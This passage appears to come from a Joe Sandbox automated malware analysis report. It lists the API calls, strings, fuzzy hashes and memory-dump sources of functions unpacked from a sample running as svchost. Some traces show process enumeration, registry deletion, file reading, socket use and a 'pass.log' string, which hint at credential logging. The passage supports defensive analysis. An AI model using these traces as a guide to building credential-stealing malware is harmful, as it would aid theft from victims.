DispatchMessageW.USER32(?), ref: 02D24F4E
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02D24F5C
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02D24F74

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
String ID:
API String ID: 1800058468-0
Opcode ID: 75c64c888a26db7024f877132c9335c8bc969662930f68b5ce955e27f3ddda20
Instruction ID: 0b77993d2b4990243ad32369e8fb1f176f744be50ac48a2b0dae12300122a73e
Opcode Fuzzy Hash: 75c64c888a26db7024f877132c9335c8bc969662930f68b5ce955e27f3ddda20
Instruction Fuzzy Hash: E311C476BC03156BE630DE98AC86FBE7769EB90B04F504811FF00EE2C0C6A1AC55C6A4

Function 02D253E0 Relevance: 9.1, APIs: 6, Instructions: 67processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D25407
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D25415
Process32First.KERNEL32(00000000,?), ref: 02D2543D
Process32Next.KERNEL32(00000000,00000128), ref: 02D25460
GetHandleInformation.KERNEL32(00000000,00000000,?,00000000), ref: 02D25479
CloseHandle.KERNEL32(00000000,?,00000000), ref: 02D2548A

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
String ID:
API String ID: 3955875343-0
Opcode ID: dcea7db9b6aed9af5dd8f03f2598db6e1a4b5f45851d0a9a8e3e1dec6bd3a3dd
Instruction ID: 825f2ff083abd64fe47a8165b01468d26e4decf03d5b3d744c9720b59e13724d
Opcode Fuzzy Hash: dcea7db9b6aed9af5dd8f03f2598db6e1a4b5f45851d0a9a8e3e1dec6bd3a3dd
Instruction Fuzzy Hash: 1511D376D01238ABD720DA64BC45BEEF7E8EB59329F940195E90CA3340D3705F59CAE0

Function 02D12A90 Relevance: 9.1, APIs: 6, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02D12A9E
GetWindowTextA.USER32(00000000,?,00000104), ref: 02D12AB9

Part of subcall function 02D12260: memset.MSVCRT ref: 02D12277
Part of subcall function 02D12260: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,7591F550,00000000), ref: 02D1228E
Part of subcall function 02D12260: PathAddBackslashA.SHLWAPI(?,?,7591F550,00000000), ref: 02D1229B
Part of subcall function 02D12260: PathFileExistsA.SHLWAPI(?,?,7591F550,00000000), ref: 02D122D7
Part of subcall function 02D12260: lstrcpynA.KERNEL32(02D59F08,00000000,00000104,00000000,00000001,?,7591F550,00000000), ref: 02D12301
Part of subcall function 02D12260: GetProcessHeap.KERNEL32(00000000,00000000,?,7591F550,00000000), ref: 02D12310
Part of subcall function 02D12260: HeapValidate.KERNEL32(00000000,?,7591F550,00000000), ref: 02D12313
Part of subcall function 02D12260: GetProcessHeap.KERNEL32(00000000,00000000,?,7591F550,00000000), ref: 02D12320
Part of subcall function 02D12260: HeapFree.KERNEL32(00000000,?,7591F550,00000000), ref: 02D12323

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D12B17
HeapValidate.KERNEL32(00000000), ref: 02D12B1A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D12B27
HeapFree.KERNEL32(00000000), ref: 02D12B2A

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Path$FreeValidate$AncestorBackslashExistsFileFolderTextWindowlstrcpynmemset
String ID:
API String ID: 649337724-0
Opcode ID: fa3d455460b7578bab28aba85bc43125227b9acc47b97aa25f2a3b2b41280e12
Instruction ID: d9b6913beb272a53140f95cca87f45ddcd793b814b42e66a4757a62265828436
Opcode Fuzzy Hash: fa3d455460b7578bab28aba85bc43125227b9acc47b97aa25f2a3b2b41280e12
Instruction Fuzzy Hash: 1D11E235A4836467DB305F70BC9CFA73BA99B11315F440950EC85973C0EBB29C44C6A0

Function 02D0B880 Relevance: 9.0, APIs: 6, Instructions: 47synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02D0B88F
IsWindow.USER32(?), ref: 02D0B8B4
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D0B8C2
ReleaseMutex.KERNEL32 ref: 02D0B8F7
IsWindow.USER32(?), ref: 02D0B8FE
SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02D0B90E

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
String ID:
API String ID: 1675675969-0
Opcode ID: a09603ea31e7d9a741f6347fa8589140c5bb27db944e0b944e69aca1a10d28ab
Instruction ID: f9bb31548e57e7495ceb7996153acd2ba4998e58d215588a877a84dd78979fd3
Opcode Fuzzy Hash: a09603ea31e7d9a741f6347fa8589140c5bb27db944e0b944e69aca1a10d28ab
Instruction Fuzzy Hash: 4001CC35E44210EFD7158F24F808FEA73E0AB49728F050AA6E9049B3E1C3B16D52CF90

Function 02D0CA20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(02D0CB54,00000000), ref: 02D0CA2F
GetWindowLongA.USER32(02D0CB54,000000F0), ref: 02D0CA49
GetScrollBarInfo.USER32(02D0CB54,000000FA,?), ref: 02D0CA64
GetScrollBarInfo.USER32(02D0CB54,000000FB,0000003C), ref: 02D0CA91

Strings

<, xrefs: 02D0CA5D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: InfoScrollWindow$LongRect
String ID: <
API String ID: 4167475372-4251816714
Opcode ID: 97fe3512e668e89ed7557a866100e0666e4ce54bd217229bcf000dc0f361548a
Instruction ID: db5063b69f5f93dbdd6879eff6810eb2f21cd9de6c8cb4318a9d0bf56419db37
Opcode Fuzzy Hash: 97fe3512e668e89ed7557a866100e0666e4ce54bd217229bcf000dc0f361548a
Instruction Fuzzy Hash: E631F574905B01AFC724CF6AD584A5AFBF5FB48314B508A1EE49A93BA0E730F850CF90

Function 02D28B40 Relevance: 8.8, APIs: 7, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0006AFB0,00000000,00000000,00000000,?,02D28FF4,00000000,00140B17), ref: 02D28B55
HeapAlloc.KERNEL32(00000000,?,02D28FF4,00000000,00140B17), ref: 02D28B5C
memset.MSVCRT ref: 02D28B6F
GetProcessHeap.KERNEL32(00000000,00000000,02D28FF0,?,02D28FF4,00000000,00140B17), ref: 02D28C1E
HeapValidate.KERNEL32(00000000,?,02D28FF4,00000000,00140B17), ref: 02D28C21
GetProcessHeap.KERNEL32(00000000,00000000,?,02D28FF4,00000000,00140B17), ref: 02D28C2D
HeapFree.KERNEL32(00000000,?,02D28FF4,00000000,00140B17), ref: 02D28C30

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocFreeValidatememset
String ID:
API String ID: 470506929-0
Opcode ID: d88348acd2ac446a33634405fb672065ab1cb74218eba111e8370bdbe3a27677
Instruction ID: 953411780472551b544477361dd54dc80928fca982fd83de942aadbc8a34fbc0
Opcode Fuzzy Hash: d88348acd2ac446a33634405fb672065ab1cb74218eba111e8370bdbe3a27677
Instruction Fuzzy Hash: 0221D6B1A017109FC720AF65D584A9BBFE9FF56758B00881DE55EDB301C734A845CFA2

Function 02D07660 Relevance: 8.8, APIs: 7, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02D07220: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,a3b7fb16a,76EDC3F0,?,?,02D122F0,00000000,00000001), ref: 02D07246
Part of subcall function 02D07220: GetFileSizeEx.KERNEL32(00000000,?,?,?,02D122F0,00000000,00000001,?,7591F550,00000000), ref: 02D07264
Part of subcall function 02D07220: GetProcessHeap.KERNEL32(00000008,?,?,?,02D122F0,00000000,00000001,?,7591F550,00000000), ref: 02D0728D
Part of subcall function 02D07220: RtlAllocateHeap.NTDLL(00000000,?,?,02D122F0,00000000,00000001,?,7591F550,00000000), ref: 02D07294
Part of subcall function 02D07220: memset.MSVCRT ref: 02D072A7
Part of subcall function 02D07220: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D072D3
Part of subcall function 02D07220: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D072E3
Part of subcall function 02D07220: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D072F2
Part of subcall function 02D07220: UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D07305
Part of subcall function 02D07220: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D07314
Part of subcall function 02D07220: HeapValidate.KERNEL32(00000000), ref: 02D0731B

GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,74E1A250,02D138FF), ref: 02D0769C
HeapAlloc.KERNEL32(00000000), ref: 02D076A3
memset.MSVCRT ref: 02D076B3
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,74E1A250,02D138FF), ref: 02D076D5
HeapValidate.KERNEL32(00000000), ref: 02D076D8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D076E5
HeapFree.KERNEL32(00000000), ref: 02D076E8

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$Validatememset$AllocAllocateCreateFreeLockPointerReadSizeUnlock
String ID:
API String ID: 4191958461-0
Opcode ID: c83ab1598bbc261ea71ae6ec6da8665b1dd4159198214c7ff9935ba1a901dbf0
Instruction ID: cc3595960e111b23ad44eb764c3854d664337e9bf80b01f84077f7c9f098fcf5
Opcode Fuzzy Hash: c83ab1598bbc261ea71ae6ec6da8665b1dd4159198214c7ff9935ba1a901dbf0
Instruction Fuzzy Hash: B211A076A0121467E760AEE9AC88F5BB7ADDB95B55F500128B909EB390CB70ED00C6F1

Function 02D1F2B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5c5904bc), ref: 02D1F2D7
PathFileExistsA.SHLWAPI(?), ref: 02D1F340

Strings

pass.log, xrefs: 02D1F31F
\t, xrefs: 02D1F2D7
5c5904bc, xrefs: 02D1F2D2, 02D1F2DD

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashExistsFile
String ID: 5c5904bc$pass.log$\t
API String ID: 1760361154-3029588526
Opcode ID: c435c46f3ed74298d895b1e2f4937107643103225f51a70dd18affe509a235b1
Instruction ID: ff91f91d6aabf0bf5c50951a90947e107102a6355f57e7ce6d28866175659b7c
Opcode Fuzzy Hash: c435c46f3ed74298d895b1e2f4937107643103225f51a70dd18affe509a235b1
Instruction Fuzzy Hash: BB11E1789042599FCB158B28B5286E77BE1AB86300B24C695E8CAC7B01EAB09D48C7C0

Function 02D17270 Relevance: 8.8, APIs: 7, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02D24550: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76EBFFB0,?,?,?,?,?,02D173C7,00000000,?,00000000), ref: 02D2457D
Part of subcall function 02D24550: GetProcessTimes.KERNEL32(00000000,?,?,?,02D173C7,?,?,?,?,?,02D173C7,00000000,?,00000000), ref: 02D2459A
Part of subcall function 02D24550: GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02D173C7,00000000,?,00000000), ref: 02D245B2
Part of subcall function 02D24550: CloseHandle.KERNEL32(00000000,?,?,?,?,?,02D173C7,00000000), ref: 02D245C3

EnterCriticalSection.KERNEL32(02D4FB80,000020FC,00000000,00000000,0081DF58,02D17534), ref: 02D17288
LeaveCriticalSection.KERNEL32(02D4FB80), ref: 02D172A4
GetProcessHeap.KERNEL32(00000000,0081DF58), ref: 02D172C9
HeapValidate.KERNEL32(00000000), ref: 02D172CC
GetProcessHeap.KERNEL32(00000000,0081DF58), ref: 02D172D9
HeapFree.KERNEL32(00000000), ref: 02D172DC
LeaveCriticalSection.KERNEL32(02D4FB80), ref: 02D172E7

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
String ID:
API String ID: 3901171168-0
Opcode ID: 57083166f50848ad066f713e7076f39caf387746214d8d1c3ede64c0c9f4dc64
Instruction ID: 0be6a7e2f238a9a7328ba09b2ff31cea27f674c3b5fcd4eeb40afee3029334c7
Opcode Fuzzy Hash: 57083166f50848ad066f713e7076f39caf387746214d8d1c3ede64c0c9f4dc64
Instruction Fuzzy Hash: DB01283AE81220ABE7305FE4B848B067794DFCAB627244815F64993314CB305C15CBE0

Function 00401920 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040194A
GetModuleHandleA.KERNEL32(ntdll.dll,?,004029EE,-00000006,00000000), ref: 00401957
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401963

Strings

ntdll.dll, xrefs: 00401952
RtlUniform, xrefs: 0040195D

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: AddressCountHandleModuleProcTick
String ID: RtlUniform$ntdll.dll
API String ID: 1545651562-3277137149
Opcode ID: 722f6cd1cbe50953a6b5d4977baf4a995fd7d4408477fa0f27fd114fcda5d871
Instruction ID: 42b0d571b2b9ac5a956892dcf26f74189b3fac86f907fc126faefe0e596b578b
Opcode Fuzzy Hash: 722f6cd1cbe50953a6b5d4977baf4a995fd7d4408477fa0f27fd114fcda5d871
Instruction Fuzzy Hash: B601A771600314DBC7149FBAAC81996B759AB88B15710443AEA09E32D3C63DDC05CBBC

Function 02D03A00 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,02D03BCE), ref: 02D03A34
RegQueryValueExA.ADVAPI32(00000000,a3b7fb2ea,00000000,?,00000000,?), ref: 02D03A55
RegCloseKey.ADVAPI32(00000000), ref: 02D03A63

Strings

a3b7fb2ea, xrefs: 02D03A4F
software\microsoft, xrefs: 02D03A1C

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: a3b7fb2ea$software\microsoft
API String ID: 3677997916-2833742656
Opcode ID: ede45bf1dd1912750cbb3dc94295fc8d3101893b67aea3adeefc5a9a4d48608a
Instruction ID: 9490a241a8cea5d1fc86bd5e3877baf1269256e58b27928e2d2af2ebe07b23b3
Opcode Fuzzy Hash: ede45bf1dd1912750cbb3dc94295fc8d3101893b67aea3adeefc5a9a4d48608a
Instruction Fuzzy Hash: 99F03C78E40308FBEB10CFA4D845FAEB7B8EB08705F504598F905A6380D7B5AE14CB90

Function 02D2C010 Relevance: 7.7, APIs: 5, Instructions: 239COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 02D2C069

Part of subcall function 02D30A00: __WSAFDIsSet.WS2_32(?,?), ref: 02D30AB0
Part of subcall function 02D30A00: closesocket.WS2_32(?), ref: 02D30ACD

realloc.MSVCRT ref: 02D2C075
malloc.MSVCRT ref: 02D2C0AD
realloc.MSVCRT ref: 02D2C0B9
malloc.MSVCRT ref: 02D2C10C

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: malloc$realloc$closesocket
String ID:
API String ID: 3133911991-0
Opcode ID: e6f22a8f0b947fff2c9e7f20cd578f81b9919fbcb84c3b7c287b188811139f41
Instruction ID: b3cb4e44a6ffd8308b4b5f89609811caf4f60d38706af953db887eb489778401
Opcode Fuzzy Hash: e6f22a8f0b947fff2c9e7f20cd578f81b9919fbcb84c3b7c287b188811139f41
Instruction Fuzzy Hash: 5591E871A102658FCB04DF24E9906DA37A2EF98305F0985B9ED0DDB346D674AD16CBB0

Function 02D140B0 Relevance: 7.6, APIs: 5, Instructions: 110COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02D140B9
VirtualQuery.KERNEL32(02D250A0,?,0000001C), ref: 02D140EC
VirtualQuery.KERNEL32(02D250A0,?,0000001C), ref: 02D14118
VirtualQuery.KERNEL32(02D250A0,?,0000001C), ref: 02D1413F
SetLastError.KERNEL32(?), ref: 02D141BC

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast
String ID:
API String ID: 2886163261-0
Opcode ID: 9366598a913b4aabe75c74ea7672db0150b1f0d169584b3444d540272984a13a
Instruction ID: ba35d7bf7cfe1bc6c67d12a43efb95a8db2547b9ae8d38cfd4d03d841cab4a08
Opcode Fuzzy Hash: 9366598a913b4aabe75c74ea7672db0150b1f0d169584b3444d540272984a13a
Instruction Fuzzy Hash: A741FAB0D00218AFDB10DFA8E884AAEBBF5FB58304F50856AE915E7700D774AD41CF91

Function 02D13E50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02D13E59
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D13E8C
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D13EB8
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D13EDF
SetLastError.KERNEL32(?), ref: 02D13F5C

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast
String ID:
API String ID: 2886163261-0
Opcode ID: bebd5398c22f587d49953268a1ebb5b9569bf9aee0f77be2f2872b8fe6a105c7
Instruction ID: 28f7dd8c74b12fcc66f20968648f208462844dc6a8efd7bfc00222178871b0ea
Opcode Fuzzy Hash: bebd5398c22f587d49953268a1ebb5b9569bf9aee0f77be2f2872b8fe6a105c7
Instruction Fuzzy Hash: 04410BB0E00318AFDB50DFA8E884AAEBBF5EB48310F50856AE559E7741D7749D41CF90

Function 02D013B0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02D013DE
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D0141A
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D01446
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D0146D
SetLastError.KERNEL32(?), ref: 02D01498

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast
String ID:
API String ID: 2886163261-0
Opcode ID: a4c16557e8b49954da4ed0beb398a9521c2fe3d71cdc07e86e7f160dff5ad3a7
Instruction ID: 71806a4d7fd5c54a798e5bef4e6a8eb13ac952b0e7fd750130ddb1478e38d345
Opcode Fuzzy Hash: a4c16557e8b49954da4ed0beb398a9521c2fe3d71cdc07e86e7f160dff5ad3a7
Instruction Fuzzy Hash: F631B9B1D00209AFDB40DFA8D885AEEBBF9FB4C314F50856AE918E7340E37499458F90

Function 02D191E0 Relevance: 7.6, APIs: 5, Instructions: 89networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 02D19202
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D19233
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D1925F
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D19286
WSASetLastError.WS2_32(?), ref: 02D192B9

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast
String ID:
API String ID: 2886163261-0
Opcode ID: 9a11bf0fb5ae7c0fa20d6af43dc42e77ad5579a903bb4c8e1f6418329db681e8
Instruction ID: 110398ea1263908a93b2638b51d8d4c1f032a2d60776cadcceed38c8b1d86e31
Opcode Fuzzy Hash: 9a11bf0fb5ae7c0fa20d6af43dc42e77ad5579a903bb4c8e1f6418329db681e8
Instruction Fuzzy Hash: FE31BCB5D00219AFDB44DFA9D894AEEBBF5FB48300F508569E919E7300E7749940CFA0

Function 02D288B0 Relevance: 7.6, APIs: 5, Instructions: 85timeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02D28D84), ref: 02D288E3
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,0000002C,00000044,00000030,0000003C,?,?,?,?,?,?,?,02D28D84), ref: 02D2890B
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,02D28D84), ref: 02D28935
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,02D28D84), ref: 02D28943
FileTimeToDosDateTime.KERNEL32(?,02D28D84,?), ref: 02D28955

Part of subcall function 02D283F0: GetFileType.KERNEL32(?,00000000,00000000), ref: 02D283F9

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: FileTime$Type$DateLocalPointerSystem
String ID:
API String ID: 60630809-0
Opcode ID: 36f8652aedaf0aa8f5d1b855ad429fa622df395b40efe06aee49716197270208
Instruction ID: 964892f04aaaf355715e7acee830551807f236254235e54f7f411cdc2f72b650
Opcode Fuzzy Hash: 36f8652aedaf0aa8f5d1b855ad429fa622df395b40efe06aee49716197270208
Instruction Fuzzy Hash: 352185B69007549FC730CF69D9C49ABF7F8FB58318B400A2EE59AD2A40D771E408CB60

Function 02D24E00 Relevance: 7.6, APIs: 5, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,02D132AB,00000000,00010108,?,00000000), ref: 02D24E3F
RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 02D24E74
RegCloseKey.ADVAPI32(?), ref: 02D24E9E
RegDeleteKeyA.ADVAPI32(00000104,02D132AB), ref: 02D24EB6
RegCloseKey.ADVAPI32(?), ref: 02D24EC2

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 7f283e0c7f2a46e92bf16fb08d6350b27b3fdce21ea6e8f690f782b8253602f2
Instruction ID: c500465e187af4018d0c7b1860f61b5d79d95b02fdf8f08d742bc58986e3988c
Opcode Fuzzy Hash: 7f283e0c7f2a46e92bf16fb08d6350b27b3fdce21ea6e8f690f782b8253602f2
Instruction Fuzzy Hash: 9721747AA40228ABD720DE58EC44FEAB7ACEB64714F144195FD44EB340D6B1AE58CBD0

Function 02D019E0 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

